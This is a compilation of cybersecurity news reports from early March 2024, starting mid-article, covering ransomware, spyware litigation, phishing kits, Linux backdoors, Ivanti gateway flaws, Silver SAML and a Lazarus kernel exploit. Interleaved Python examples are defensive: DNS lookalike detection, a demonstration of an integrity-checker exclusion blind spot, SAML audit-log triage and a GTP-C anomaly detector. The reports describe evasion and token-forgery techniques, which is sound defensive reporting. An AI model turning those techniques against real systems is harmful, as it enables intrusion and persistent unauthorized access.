The attack is also notable for the targeting of the unnamed company's virtualization infrastructure, indicating that CACTUS actors have broadened their focus beyond Windows hosts to strike Hyper-V and VMware ESXi hosts.
It also leveraged a critical security flaw (CVE-2023-38035, CVSS score: 9.8) in an internet-exposed Ivanti Sentry server less than 24 hours after its initial disclosure in August 2023, once again highlighting opportunistic and rapid weaponization of newly published vulnerabilities.
Ransomware continues to be a major money spinner for financially motivated threat actors, with initial ransomware demands reaching a median of $600,000 in 2023, a 20% jump from the previous year, according to Arctic Wolf. As of Q4 2023, the average ransom payment stands at $568,705 per victim.
What's more, paying a ransom demand does not amount to future protection. There is no guarantee that a victim's data and systems will be safely recovered and that the attackers won't sell the stolen data on underground forums or attack them again.
Data shared by cybersecurity company Cybereason shows that "a staggering 78% [of organizations] were attacked again after paying the ransom – 82% of them within a year," in some cases by the same threat actor. Of these victims, 63% were "asked to pay more the second time."
U.S. Court Orders NSO Group to Hand Over Pegasus Spyware Code to WhatsApp
2.3.24
BigBrothers
The Hacker News
A U.S. judge has ordered NSO Group to hand over its source code for Pegasus and other products to Meta as part of the social media giant's ongoing litigation against the Israeli spyware vendor.
The decision marks a major legal victory for Meta, which filed the lawsuit in October 2019 over the use of its infrastructure to distribute the spyware to approximately 1,400 mobile devices between April and May, including those of two dozen Indian activists and journalists.
These attacks leveraged a then zero-day flaw in the instant messaging app (CVE-2019-3568, CVSS score: 9.8), a critical buffer overflow bug in the voice call functionality, to deliver Pegasus by merely placing a call, even in scenarios where the calls were left unanswered.
In addition, the attack chain included steps to erase the incoming call information from the logs in an attempt to sidestep detection.
Court documents released late last month show that NSO Group has been asked to "produce information concerning the full functionality of the relevant spyware," specifically for a period of one year before the alleged attack to one year after the alleged attack (i.e., from April 29, 2018, to May 10, 2020).
That said, the company doesn't have to "provide specific information regarding the server architecture at this time" because WhatsApp "would be able to glean the same information from the full functionality of the alleged spyware." Perhaps more significantly, it has been spared from sharing the identities of its clientele.
"While the court's decision is a positive development, it is disappointing that NSO Group will be allowed to continue keeping the identity of its clients, who are responsible for this unlawful targeting, secret," said Donncha Ó Cearbhaill, head of the Security Lab at Amnesty International.
NSO Group was sanctioned by the U.S. in 2021 for developing and supplying cyber weapons to foreign governments that "used these tools to maliciously target government officials, journalists, businesspeople, activists, academics, and embassy workers."
The development comes as Recorded Future revealed a new multi-tiered delivery infrastructure associated with Predator, a mercenary mobile spyware managed by the Intellexa Alliance.
The infrastructure network is highly likely associated with Predator customers, including in countries like Angola, Armenia, Botswana, Egypt, Indonesia, Kazakhstan, Mongolia, Oman, the Philippines, Saudi Arabia, and Trinidad and Tobago. It's worth noting that no Predator customers within Botswana and the Philippines had been identified until now.
"Although Predator operators respond to public reporting by altering certain aspects of their infrastructure, they seem to persist with minimal alterations to their modes of operation; these include consistent spoofing themes and focus on types of organizations, such as news outlets, while adhering to established infrastructure setups," the company said.
U.S. Charges Iranian Hacker, Offers $10 Million Reward for Capture
2.3.24
Crime
The Hacker News
The U.S. Department of Justice (DoJ) on Friday unsealed an indictment against an Iranian national for his alleged involvement in a multi-year cyber-enabled campaign designed to compromise U.S. governmental and private entities.
More than a dozen entities are said to have been targeted, including the U.S. Departments of the Treasury and State, defense contractors that support U.S. Department of Defense programs, and an accounting firm and a hospitality company, both based in New York.
Alireza Shafie Nasab, 39, claimed to be a cybersecurity specialist for a company named Mahak Rayan Afraz while participating in a persistent campaign targeting the U.S. from at least in or about 2016 through in or about April 2021.
"As alleged, Alireza Shafie Nasab participated in a cyber campaign using spear-phishing and other hacking techniques to infect more than 200,000 victim devices, many of which contained sensitive or classified defense information," said U.S. Attorney Damian Williams for the Southern District of New York.
The spear-phishing campaigns were managed via a custom application that made it possible for Nasab and his co-conspirators to organize and deploy their attacks.
In one instance, the threat actors breached an administrator email account belonging to an unnamed defense contractor, subsequently leveraging the access to create rogue accounts and send out spear-phishing emails to employees of a different defense contractor and a consulting firm.
Outside of spear-phishing attacks, the conspirators have masqueraded as other people, typically women, to obtain the confidence of victims and deploy malware onto victim computers.
Nasab, while working for the front company, is believed to be responsible for procuring infrastructure utilized in the campaign by using the stolen identity of a real person in order to register a server and email accounts.
He has been charged with one count of conspiracy to commit computer fraud, one count of conspiracy to commit wire fraud, one count of wire fraud, and one count of aggravated identity theft. If convicted on all counts, Nasab could face up to 47 years in prison.
While Nasab remains at large, the U.S. State Department has announced monetary rewards of up to $10 million for information leading to the identification or location of Nasab.
Mahak Rayan Afraz (MRA) was first outed by Meta in July 2021 as a Tehran-based firm with ties to the Islamic Revolutionary Guard Corps (IRGC), Iran's armed force charged with defending the country's revolutionary regime.
The activity cluster, which also overlaps with Tortoiseshell, has been previously linked to elaborate social engineering campaigns, including posing as an aerobics instructor on Facebook in an attempt to infect the machine of an employee of an aerospace defense contractor with malware.
The development comes as German law enforcement announced the takedown of Crimemarket, a German-speaking illicit trading platform with over 180,000 users that specialized in the sale of narcotics, weapons, money laundering, and other criminal services.
Six people have been arrested in connection with the operation, counting a 23-year-old considered the main suspect, with authorities also seizing mobile phones, IT equipment, one kilogram of marijuana, ecstasy tablets, and €600,000 in cash.
New Phishing Kit Leverages SMS, Voice Calls to Target Cryptocurrency Users
2.3.24
Cryptocurrency
The Hacker News
A novel phishing kit has been observed impersonating the login pages of well-known cryptocurrency services as part of an attack cluster codenamed CryptoChameleon that's designed to primarily target mobile devices.
"This kit enables attackers to build carbon copies of single sign-on (SSO) pages, then use a combination of email, SMS, and voice phishing to trick the target into sharing usernames, passwords, password reset URLs, and even photo IDs from hundreds of victims, mostly in the United States," Lookout said in a report.
Targets of the phishing kit include employees of the Federal Communications Commission (FCC), Binance, Coinbase, and cryptocurrency users of various platforms like Binance, Coinbase, Gemini, Kraken, ShakePay, Caleb & Brown, and Trezor. More than 100 victims have been successfully phished to date.
The phishing pages are designed such that the fake login screen is displayed only after the victim completes a CAPTCHA test using hCaptcha, thus preventing automated analysis tools from flagging the sites.
In some cases, these pages are distributed via unsolicited phone calls and text messages by spoofing a company's customer support team under the pretext of securing their account after a purported hack.
Once the user enters their credentials, they are either asked to provide a two-factor authentication (2FA) code or asked to "wait" while it claims to verify the provided information.
"The attacker likely attempts to log in using these credentials in real time, then redirects the victim to the appropriate page depending on what additional information is requested by the MFA service the attacker is trying to access," Lookout said.
The phishing kit also attempts to give an illusion of credibility by allowing the operator to customize the phishing page in real-time by providing the last two digits of the victim's actual phone number and selecting whether the victim should be asked for a six or seven digit token.
The one-time password (OTP) entered by the user is then captured by the threat actor, who uses it to sign in to the desired online service using the provided token. In the next step, the victim can be directed to any page of the attacker's choosing, including the legitimate Okta login page or a page that displays customized messages.
Lookout said CryptoChameleon's modus operandi resembles techniques used by Scattered Spider, specifically in its impersonation of Okta and the use of domains that have been previously identified as affiliated with the group.
"Despite the URLs and spoofed pages looking similar to what Scattered Spider might create, there are significantly different capabilities and C2 infrastructure within the phishing kit," the company said. "This type of copycatting is common amongst threat actor groups, especially when a series of tactics and procedures have had so much public success."
It's currently also not clear if this is the work of a single threat actor or a common tool being used by different groups.
"The combination of high quality phishing URLs, login pages that perfectly match the look and feel of the legitimate sites, a sense of urgency, and consistent connection through SMS and voice calls is what has given the threat actors so much success stealing high quality data," Lookout noted.
The development comes as Fortra revealed that financial institutions in Canada have been targeted by a new phishing-as-a-service (PhaaS) group called LabHost, which overtook its rival Frappo in popularity in 2023.
LabHost's phishing attacks are pulled off by means of a real-time campaign management tool named LabRat that makes it possible to stage an adversary-in-the-middle (AiTM) attack and capture credentials and 2FA codes.
Also developed by the threat actor is an SMS spamming tool dubbed LabSend that provides an automated method for sending links to LabHost phishing pages, thereby allowing its customers to mount smishing campaigns at scale.
"LabHost services allow threat actors to target a variety of financial institutions with features ranging from ready-to-use templates, real-time campaign management tools, and SMS lures," the company said.
New BIFROSE Linux Malware Variant Using Deceptive VMware Domain for Evasion
2.3.24
Virus
The Hacker News
Cybersecurity researchers have discovered a new Linux variant of a remote access trojan (RAT) called BIFROSE (aka Bifrost) that uses a deceptive domain mimicking VMware.
"This latest version of Bifrost aims to bypass security measures and compromise targeted systems," Palo Alto Networks Unit 42 researchers Anmol Maurya and Siddharth Sharma said.
BIFROSE is one of the long-standing threats that has been active since 2004. It has been offered for sale in underground forums for up to $10,000 in the past, according to a report from Trend Micro in December 2015.
The malware has been put to use by a state-backed hacking group from China tracked as BlackTech (aka Circuit Panda, HUAPI, Manga Taurus, Palmerworm, PLEAD, Red Djinn, and Temp.Overboard), which has a history of striking organizations in Japan, Taiwan, and the U.S.
It's suspected that the threat actor purchased the source code or gained access to it around 2010, and repurposed the malware for use in its own campaigns via custom backdoors like KIVARS and XBOW.
Linux variants of BIFROSE (aka ELF_BIFROSE) have been observed since at least 2020 with capabilities to launch remote shells, download/upload files, and perform file operations.
"Attackers typically distribute Bifrost through email attachments or malicious websites," the researchers said. "Once installed on a victim's computer, Bifrost allows the attacker to gather sensitive information, like the victim's hostname and IP address."
What makes the latest variant noteworthy is that it reaches out to a command-and-control (C2) server with the name "download.vmfare[.]com" in an attempt to masquerade as VMware. The deceptive domain is resolved by contacting a Taiwan-based public DNS resolver with the IP address 168.95.1[.]1.
Unit 42 said it detected a spike in Bifrost activity since October 2023, identifying no less than 104 artifacts in its telemetry. It further discovered an Arm version of the malware, suggesting the threat actors are likely looking to expand their attack surface.
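The two behaviours described above (a typosquatted brand domain and name resolution through an external public resolver instead of the site's own) are both visible in DNS telemetry. The following is an added example, not code from Unit 42 or the article, that scans constructed DNS query log lines for exactly those two signals; the log layout, the approved-resolver set and the brand-label list are assumptions made for the example, while the domain and resolver values are the ones reported on the page.

```python
import difflib

# Constructed DNS query log: "<timestamp> <client> <resolver> <qname>"
# (field layout is an assumption for this example, not a real product format).
SAMPLE_DNS_LOG = """\
2024-02-27T10:00:01Z 10.0.0.5 10.0.0.2 updates.vmware.com
2024-02-27T10:00:02Z 10.0.0.7 168.95.1.1 download.vmfare.com
2024-02-27T10:00:03Z 10.0.0.9 10.0.0.2 mail.example.org
2024-02-27T10:00:04Z 10.0.0.7 8.8.8.8 cdn.example.net
"""

# Assumption: hosts should only talk to the site's own resolver; anything else
# is a process doing its own lookups (the page reports 168.95.1[.]1 being used).
APPROVED_RESOLVERS = {"10.0.0.2"}

# Sample of brand labels commonly impersonated in lookalike domains.
BRAND_LABELS = ["vmware", "microsoft", "google"]


def lookalike_brand(qname, cutoff=0.8):
    """Return the brand a DNS label closely resembles without being equal to it.

    difflib's ratio is used as a cheap similarity test: 'vmfare' vs 'vmware'
    scores 0.83, above the cutoff, while unrelated labels score far lower.
    """
    for label in qname.lower().rstrip(".").split("."):
        if label in BRAND_LABELS:
            continue                       # the genuine brand label is fine
        close = difflib.get_close_matches(label, BRAND_LABELS, n=1, cutoff=cutoff)
        if close:
            return close[0]
    return None


def analyze_dns_log(text):
    """Flag queries sent to unapproved resolvers and/or for brand-lookalike names."""
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, resolver, qname = line.split()
        reasons = []
        if resolver not in APPROVED_RESOLVERS:
            reasons.append(f"direct query to unapproved resolver {resolver}")
        brand = lookalike_brand(qname)
        if brand:
            reasons.append(f"'{qname}' resembles brand '{brand}'")
        if reasons:
            findings.append({"time": ts, "client": client, "qname": qname,
                             "resolver": resolver, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in analyze_dns_log(SAMPLE_DNS_LOG):
        print(f["time"], f["client"], f["qname"], "->", "; ".join(f["reasons"]))
```

A host that triggers both reasons at once, as the second sample line does, is the combination worth prioritising: a single process bypassing the configured resolver to reach a brand-lookalike name is far more specific than either signal alone.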
"With new variants that employ deceptive domain strategies like typosquatting, a recent spike in Bifrost activity highlights the dangerous nature of this malware," the researchers said.
The development comes as McAfee Labs detailed a new GuLoader campaign that propagates the malware through malicious SVG file attachments in email messages. The malware has also been observed being distributed via VBS scripts as part of a multi-stage payload delivery.
"This recent surge highlights its evolving tactics for broader reach and evasion," Trustwave SpiderLabs said in a post on X earlier this week.
The Bifrost and GuLoader attacks coincide with the release of a new version of the Warzone RAT, which recently had two of its operators arrested and its infrastructure dismantled by the U.S. government.
Five Eyes Agencies Warn of Active Exploitation of Ivanti Gateway Vulnerabilities
1.3.24
Exploit
The Hacker News
The Five Eyes (FVEY) intelligence alliance has issued a new cybersecurity advisory warning of cyber threat actors exploiting known security flaws in Ivanti Connect Secure and Ivanti Policy Secure gateways, noting that the Integrity Checker Tool (ICT) can be deceived to provide a false sense of security.
"Ivanti ICT is not sufficient to detect compromise and that a cyber threat actor may be able to gain root-level persistence despite issuing factory resets," the agencies said.
To date, Ivanti has disclosed five security vulnerabilities impacting its products since January 10, 2024, out of which four have come under active exploitation by multiple threat actors to deploy malware -
CVE-2023-46805 (CVSS score: 8.2) - Authentication bypass vulnerability in web component
CVE-2024-21887 (CVSS score: 9.1) - Command injection vulnerability in web component
CVE-2024-21888 (CVSS score: 8.8) - Privilege escalation vulnerability in web component
CVE-2024-21893 (CVSS score: 8.2) - SSRF vulnerability in the SAML component
CVE-2024-22024 (CVSS score: 8.3) - XXE vulnerability in the SAML component
Mandiant, in an analysis published this week, described how an encrypted version of malware known as BUSHWALK is placed in a directory excluded by ICT in /data/runtime/cockpit/diskAnalysis.
The directory exclusions were also previously highlighted by Eclypsium this month, stating the tool skips a dozen directories from being scanned, thus allowing an attacker to leave behind backdoors in one of these paths and still pass the integrity check.
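To make the blind spot concrete, here is an added illustration (not Ivanti's ICT code, nor Mandiant's or Eclypsium's) of a minimal file-integrity check run two ways over the same constructed directory tree: once with a directory exclusion list and once without. The excluded path mirrors the one the page reports; the file names and contents are constructed for the example.

```python
import hashlib
import tempfile
from pathlib import Path

# Directory the page reports as skipped by the checker (relative here, inside a
# temporary tree, so the example runs anywhere).
EXCLUDED_DIRS = ("data/runtime/cockpit/diskAnalysis",)


def hash_file(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root: Path, excluded=()) -> dict:
    """Map each regular file (relative POSIX path) under root to its SHA-256.

    Files whose relative path begins with an excluded directory are skipped,
    which is exactly what creates the blind spot demonstrated below.
    """
    manifest = {}
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        if any(rel == ex or rel.startswith(ex + "/") for ex in excluded):
            continue
        manifest[rel] = hash_file(path)
    return manifest


def diff_manifests(baseline: dict, current: dict) -> dict:
    """Report files added, removed or modified relative to a known-good baseline."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "changed": sorted(p for p in baseline.keys() & current.keys()
                          if baseline[p] != current[p]),
    }


def demo():
    """Plant a file in the excluded directory and compare both scan modes."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "bin").mkdir()
        (root / "bin" / "httpd").write_bytes(b"constructed legitimate binary")
        dropped_dir = root / "data/runtime/cockpit/diskAnalysis"
        dropped_dir.mkdir(parents=True)

        # Known-good baselines taken before anything is planted.
        baseline_excl = build_manifest(root, EXCLUDED_DIRS)
        baseline_full = build_manifest(root)

        # Constructed stand-in for a payload dropped into the excluded path.
        (dropped_dir / "planted.bin").write_bytes(b"constructed opaque blob")

        with_exclusions = diff_manifests(baseline_excl, build_manifest(root, EXCLUDED_DIRS))
        without_exclusions = diff_manifests(baseline_full, build_manifest(root))
        return with_exclusions, without_exclusions


if __name__ == "__main__":
    with_excl, without_excl = demo()
    print("with exclusions   :", with_excl)      # nothing reported
    print("without exclusions:", without_excl)   # planted file is reported
```

The point for defenders is the asymmetry the two result dictionaries show: an exclusion list turns every listed directory into a place where new or modified files are never compared against the baseline, so a clean report from such a tool proves nothing about those paths and cannot by itself rule out persistence.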
"The safest course of action for network defenders is to assume a sophisticated threat actor may deploy rootkit level persistence on a device that has been reset and lay dormant for an arbitrary amount of time," agencies from Australia, Canada, New Zealand, the U.K., and the U.S. said.
They also urged organizations to "consider the significant risk of adversary access to, and persistence on, Ivanti Connect Secure and Ivanti Policy Secure gateways when determining whether to continue operating these devices in an enterprise environment."
Ivanti, in response to the advisory, said it's not aware of any instances of successful threat actor persistence following the implementation of security updates and factory resets. It's also releasing a new version of ICT that it said "provides additional visibility into a customer's appliance and all files that are present on the system."
GitHub Rolls Out Default Secret Scanning Push Protection for Public Repositories
1.3.24
Security
The Hacker News
GitHub on Thursday announced that it's enabling secret scanning push protection by default for all pushes to public repositories.
"This means that when a supported secret is detected in any push to a public repository, you will have the option to remove the secret from your commits or, if you deem the secret safe, bypass the block," Eric Tooley and Courtney Claessens said.
Push protection was first piloted as an opt-in feature in August 2023, although it has been under testing since April 2022. It became generally available in May 2023.
The secret scanning feature is designed to identify over 200 token types and patterns from more than 180 service providers in order to prevent their fraudulent use by malicious actors.
The development comes nearly five months after the Microsoft subsidiary expanded secret scanning to include validity checks for popular services such as Amazon Web Services (AWS), Microsoft, Google, and Slack.
It also follows the discovery of an ongoing "repo confusion" attack targeting GitHub that's inundating the source code hosting platform with thousands of repositories containing obfuscated malware capable of stealing passwords and cryptocurrency from developer devices.
The attacks represent another wave of the same malware distribution campaign that was disclosed by Phylum and Trend Micro last year, leveraging bogus Python packages hosted on the cloned, trojanized repositories to deliver a stealer malware called BlackCap Grabber.
"Repo confusion attacks simply rely on humans to mistakenly pick the malicious version over the real one, sometimes employing social engineering techniques as well," Apiiro said in a report this week.
New Silver SAML Attack Evades Golden SAML Defenses in Identity Systems
1.3.24
Attack
The Hacker News
Cybersecurity researchers have disclosed a new attack technique called Silver SAML that can be successful even in cases where mitigations have been applied against Golden SAML attacks.
Silver SAML "enables the exploitation of SAML to launch attacks from an identity provider like Entra ID against applications configured to use it for authentication, such as Salesforce," Semperis researchers Tomer Nahum and Eric Woodruff said in a report shared with The Hacker News.
Golden SAML (short for Security Assertion Markup Language) was first documented by CyberArk in 2017. The attack vector, in a nutshell, entails the abuse of the interoperable authentication standard to impersonate almost any identity in an organization.
It's also similar to the Golden Ticket attack in that it grants attackers the ability to gain unauthorized access to any service in a federation with any privileges and to stay persistent in this environment in a stealthy manner.
"Golden SAML introduces to a federation the advantages that golden ticket offers in a Kerberos environment – from gaining any type of access to stealthily maintaining persistency," security researcher Shaked Reiner noted at the time.
Real-world attacks leveraging the method have been rare, the first recorded use being the compromise of SolarWinds infrastructure to gain administrative access by forging SAML tokens using compromised SAML token signing certificates.
Golden SAML has also been weaponized by an Iranian threat actor codenamed Peach Sandstorm in a March 2023 intrusion to access an unnamed target's cloud resources sans requiring any password, Microsoft revealed in September 2023.
The latest approach is a spin on Golden SAML that works with an identity provider (IdP) like Microsoft Entra ID (formerly Azure Active Directory) and doesn't require access to the Active Directory Federation Services (AD FS). It has been assessed as a moderate-severity threat to organizations.
"Within Entra ID, Microsoft provides a self-signed certificate for SAML response signing," the researchers said. "Alternatively, organizations can choose to use an externally generated certificate such as those from Okta. However, that option introduces a security risk."
"Any attacker that obtains the private key of an externally generated certificate can forge any SAML response they want and sign that response with the same private key that Entra ID holds. With this type of forged SAML response, the attacker can then access the application — as any user."
Following responsible disclosure to Microsoft on January 2, 2024, the company said the issue does not meet its bar for immediate servicing, but noted it will take appropriate action as needed to safeguard customers.
While there is no evidence that Silver SAML has been exploited in the wild, organizations are required to use only Entra ID self-signed certificates for SAML signing purposes. Semperis has also made available a proof-of-concept (PoC) dubbed SilverSAMLForger to create custom SAML responses.
"Organizations can monitor Entra ID audit logs for changes to PreferredTokenSigningKeyThumbprint under ApplicationManagement," the researchers said.
"You will need to correlate those events to Add service principal credential events that relate to the service principal. The rotation of expired certificates is a common process, so you will need to determine whether the audit events are legitimate. Implementing change control processes to document the rotation can help to minimize confusion during rotation events."
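The monitoring advice in the two quoted paragraphs amounts to a correlation rule: every change to PreferredTokenSigningKeyThumbprint should be matched to an "Add service principal credential" event for the same service principal and to a change-control record, and anything left over needs a human look. The following is an added example, not Semperis' or Microsoft's code, that applies that rule to constructed audit events; the event field names, the time window and the change-control register are assumptions made for the example, while the property and activity names are those quoted on the page.

```python
from datetime import datetime, timedelta

# Constructed audit events. Field names are an assumption for this example;
# a real Entra ID audit export has a different, richer shape.
AUDIT_EVENTS = [
    {"time": "2024-02-20T09:00:00Z", "category": "ApplicationManagement",
     "activity": "Add service principal credential", "target": "sp-salesforce",
     "actor": "admin@example.com", "modified_properties": ["KeyDescription"]},
    {"time": "2024-02-20T09:05:00Z", "category": "ApplicationManagement",
     "activity": "Update service principal", "target": "sp-salesforce",
     "actor": "admin@example.com",
     "modified_properties": ["PreferredTokenSigningKeyThumbprint"]},
    {"time": "2024-02-21T13:00:00Z", "category": "ApplicationManagement",
     "activity": "Add service principal credential", "target": "sp-hr-portal",
     "actor": "svc-automation@example.com", "modified_properties": ["KeyDescription"]},
    {"time": "2024-02-21T13:10:00Z", "category": "ApplicationManagement",
     "activity": "Update service principal", "target": "sp-hr-portal",
     "actor": "svc-automation@example.com",
     "modified_properties": ["PreferredTokenSigningKeyThumbprint"]},
    {"time": "2024-02-22T16:00:00Z", "category": "ApplicationManagement",
     "activity": "Update service principal", "target": "sp-finance",
     "actor": "jdoe@example.com",
     "modified_properties": ["PreferredTokenSigningKeyThumbprint"]},
    {"time": "2024-02-22T16:30:00Z", "category": "UserManagement",
     "activity": "Update user", "target": "jdoe@example.com",
     "actor": "jdoe@example.com", "modified_properties": ["DisplayName"]},
]

# Constructed change-control register: service principal -> ticket documenting
# a planned certificate rotation.
CHANGE_CONTROL = {"sp-salesforce": "CHG-1042"}


def parse_time(ts):
    return datetime.fromisoformat(ts.replace("Z", "+00:00"))


def triage_signing_key_changes(events, change_control, window=timedelta(hours=1)):
    """Classify each PreferredTokenSigningKeyThumbprint change.

    documented_rotation   : a credential was added to the same SP within the
                            window and a change ticket exists -> expected.
    undocumented_rotation : credential added, but no ticket -> review.
    no_matching_credential_event : the preferred key changed with no new
                            credential nearby -> investigate.
    """
    credential_adds = [e for e in events
                       if e["activity"] == "Add service principal credential"]
    results = []
    for e in events:
        if e["category"] != "ApplicationManagement":
            continue
        if "PreferredTokenSigningKeyThumbprint" not in e["modified_properties"]:
            continue
        when = parse_time(e["time"])
        related = [c for c in credential_adds
                   if c["target"] == e["target"]
                   and abs(parse_time(c["time"]) - when) <= window]
        ticket = change_control.get(e["target"])
        if related and ticket:
            verdict = "documented_rotation"
        elif related:
            verdict = "undocumented_rotation"
        else:
            verdict = "no_matching_credential_event"
        results.append({"target": e["target"], "time": e["time"], "actor": e["actor"],
                        "credential_events": len(related), "ticket": ticket,
                        "verdict": verdict})
    return results


if __name__ == "__main__":
    for r in triage_signing_key_changes(AUDIT_EVENTS, CHANGE_CONTROL):
        print(f"{r['time']} {r['target']:<14} by {r['actor']:<28} -> {r['verdict']}")
```

Legitimate rotations dominate this signal, so the value of the rule lies in the register: with rotations documented ahead of time, the residual "undocumented" and "no matching credential" cases are few enough to be reviewed individually.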
GTPDOOR Linux Malware Targets Telecoms, Exploiting GPRS Roaming Networks
1.3.24
Virus
The Hacker News
Threat hunters have discovered a new Linux malware called GTPDOOR that's designed to be deployed in telecom networks that are adjacent to GPRS roaming exchanges (GRX).
The malware is novel in that it leverages the GPRS Tunnelling Protocol (GTP) for command-and-control (C2) communications.
GPRS roaming allows subscribers to access their GPRS services while they are beyond the reach of their home mobile network. This is facilitated by means of a GRX that transports the roaming traffic using GTP between the visited and the home Public Land Mobile Network (PLMN).
Security researcher haxrob, who discovered two GTPDOOR artifacts uploaded to VirusTotal from China and Italy, said the backdoor is likely linked to a known threat actor tracked as LightBasin (aka UNC1945), which was previously disclosed by CrowdStrike in October 2021 in connection with a series of attacks targeting the telecom sector to steal subscriber information and call metadata.
"When run, the first thing GTPDOOR does is process-name stomps itself – changing its process name to '[syslog]' – disguised as syslog invoked from the kernel," the researcher said. "It suppresses child signals and then opens a raw socket [that] will allow the implant to receive UDP messages that hit the network interfaces."
Put differently, GTPDOOR allows a threat actor that already has established persistence on the roaming exchange network to contact a compromised host by sending GTP-C Echo Request messages with a malicious payload.
This magic GTP-C Echo Request message acts as a conduit to transmit a command to be executed on the infected machine and return the results back to the remote host.
GTPDOOR "can be covertly probed from an external network to elicit a response by sending a TCP packet to any port number," the researcher noted. "If the implant is active a crafted empty TCP packet is returned along with information if the destination port was open/responding on the host."
"This implant looks like it is designed to sit on compromised hosts that directly touch the GRX network – these are the systems that communicate to other telecommunication operator networks via the GRX."
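A GTP-C Echo Request is a path-management keepalive and normally carries nothing beyond its header and sequence fields (at most an optional Private Extension information element), so an Echo Request with extra data in it is a simple, protocol-grounded thing to alert on at the GRX border. The following is an added example written for this page, not haxrob's or CrowdStrike's code: it parses GTPv1-C headers from constructed datagrams and flags Echo Requests whose payload is anything other than Private Extension IEs. The packet builder and the sample payloads are constructed for the example; the header layout follows GTPv1.

```python
import struct

GTP_ECHO_REQUEST = 1          # GTPv1-C message type for Echo Request
IE_PRIVATE_EXTENSION = 0xFF   # the only IE an Echo Request may legitimately carry


def build_gtpv1(msg_type, payload=b"", seq=1, teid=0):
    """Construct a GTPv1 message with the sequence-number flag set (S=1)."""
    flags = 0x32                                   # version 1, PT=1 (GTP), E=0, S=1, PN=0
    optional = struct.pack("!HBB", seq, 0, 0)      # seq, N-PDU number, next ext header type
    body = optional + payload
    return struct.pack("!BBHI", flags, msg_type, len(body), teid) + body


def parse_gtpv1(data):
    """Parse the mandatory 8-byte header plus optional fields; return the rest as payload."""
    if len(data) < 8:
        raise ValueError("short GTP header")
    flags, msg_type, length, teid = struct.unpack("!BBHI", data[:8])
    if flags >> 5 != 1:
        raise ValueError("not GTPv1")
    body = data[8:8 + length]                      # length counts everything after byte 8
    if len(body) != length:
        raise ValueError("length field disagrees with datagram size")
    seq = None
    if flags & 0x07:                               # any of E/S/PN set: 4 optional bytes present
        if len(body) < 4:
            raise ValueError("optional header fields missing")
        seq = struct.unpack("!H", body[:2])[0]
        body = body[4:]
    return {"msg_type": msg_type, "teid": teid, "seq": seq, "payload": body}


def echo_request_anomaly(msg):
    """Return a reason if an Echo Request carries anything unexpected, else None."""
    if msg["msg_type"] != GTP_ECHO_REQUEST:
        return None
    if msg["teid"] != 0:                           # path-management messages use TEID 0
        return "non-zero TEID in Echo Request"
    payload, i = msg["payload"], 0
    while i < len(payload):                        # walk TLV IEs; only Private Extension allowed
        if payload[i] != IE_PRIVATE_EXTENSION:
            return f"unexpected byte 0x{payload[i]:02x} at offset {i} of Echo Request payload"
        if i + 3 > len(payload):
            return "truncated Private Extension IE"
        ie_len = struct.unpack("!H", payload[i + 1:i + 3])[0]
        i += 3 + ie_len
    if i != len(payload):
        return "Private Extension IE length overruns payload"
    return None


# Constructed sample datagrams as they would arrive on UDP/2123.
BENIGN_ECHO = build_gtpv1(GTP_ECHO_REQUEST)
BENIGN_WITH_EXT = build_gtpv1(GTP_ECHO_REQUEST,
                              bytes([IE_PRIVATE_EXTENSION, 0, 2, 0x0A, 0x0B]))
SUSPICIOUS_ECHO = build_gtpv1(GTP_ECHO_REQUEST, b"constructed opaque payload")


def triage(datagrams):
    """Return (index, reason) for every datagram that looks like a misused Echo Request."""
    hits = []
    for idx, d in enumerate(datagrams):
        try:
            reason = echo_request_anomaly(parse_gtpv1(d))
        except ValueError as exc:
            reason = f"malformed: {exc}"
        if reason:
            hits.append((idx, reason))
    return hits


if __name__ == "__main__":
    for idx, reason in triage([BENIGN_ECHO, BENIGN_WITH_EXT, SUSPICIOUS_ECHO]):
        print(f"datagram {idx}: {reason}")
```

Because the implant listens on a raw socket, the host firewall's view of "open ports" says nothing about whether such messages are being consumed; inspecting the GTP-C flow itself, as above, or checking for a process named "[syslog]" that has a real executable behind it (kernel threads do not) are the observations the write-up points to.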
Lazarus Hackers Exploited Windows Kernel Flaw as Zero-Day in Recent Attacks
1.3.24
Exploit
The Hacker News
The notorious Lazarus Group actors exploited a recently patched privilege escalation flaw in the Windows Kernel as a zero-day to obtain kernel-level access and disable security software on compromised hosts.
The vulnerability in question is CVE-2024-21338 (CVSS score: 7.8), which can permit an attacker to gain SYSTEM privileges. It was resolved by Microsoft earlier this month as part of Patch Tuesday updates.
"To exploit this vulnerability, an attacker would first have to log on to the system," Microsoft said. "An attacker could then run a specially crafted application that could exploit the vulnerability and take control of an affected system."
While there were no indications of active exploitation of CVE-2024-21338 at the time of the release of the updates, Redmond on Wednesday revised its "Exploitability assessment" for the flaw to "Exploitation Detected."
It's currently not clear when the attacks took place, but the vulnerability is said to have been introduced in Windows 10, version 1703 (RS2/15063) when the 0x22A018 IOCTL (short for input/output control) handler was first implemented.
Cybersecurity vendor Avast, which discovered an in-the-wild admin-to-kernel exploit for the bug, said the kernel read/write primitive achieved by weaponizing the flaw allowed the Lazarus Group to "perform direct kernel object manipulation in an updated version of their data-only FudModule rootkit."
The FudModule rootkit was first reported by ESET and AhnLab in October 2022 as capable of disabling the monitoring of all security solutions on infected hosts by means of what's called a Bring Your Own Vulnerable Driver (BYOVD) attack, wherein an attacker implants a driver susceptible to a known or zero-day flaw to escalate privileges.
What makes the latest attack significant is that it goes "beyond BYOVD by exploiting a zero-day in a driver that's known to be already installed on the target machine." That susceptible driver is appid.sys, which is crucial to the functioning of a Windows component called AppLocker that's responsible for application control.
The real-world exploit devised by the Lazarus Group entails using CVE-2024-21338 in the appid.sys driver to execute arbitrary code in a manner that bypasses all security checks and runs the FudModule rootkit.
"FudModule is only loosely integrated into the rest of Lazarus' malware ecosystem and that Lazarus is very careful about using the rootkit, only deploying it on demand under the right circumstances," security researcher Jan Vojtěšek said, describing the malware as under active development.
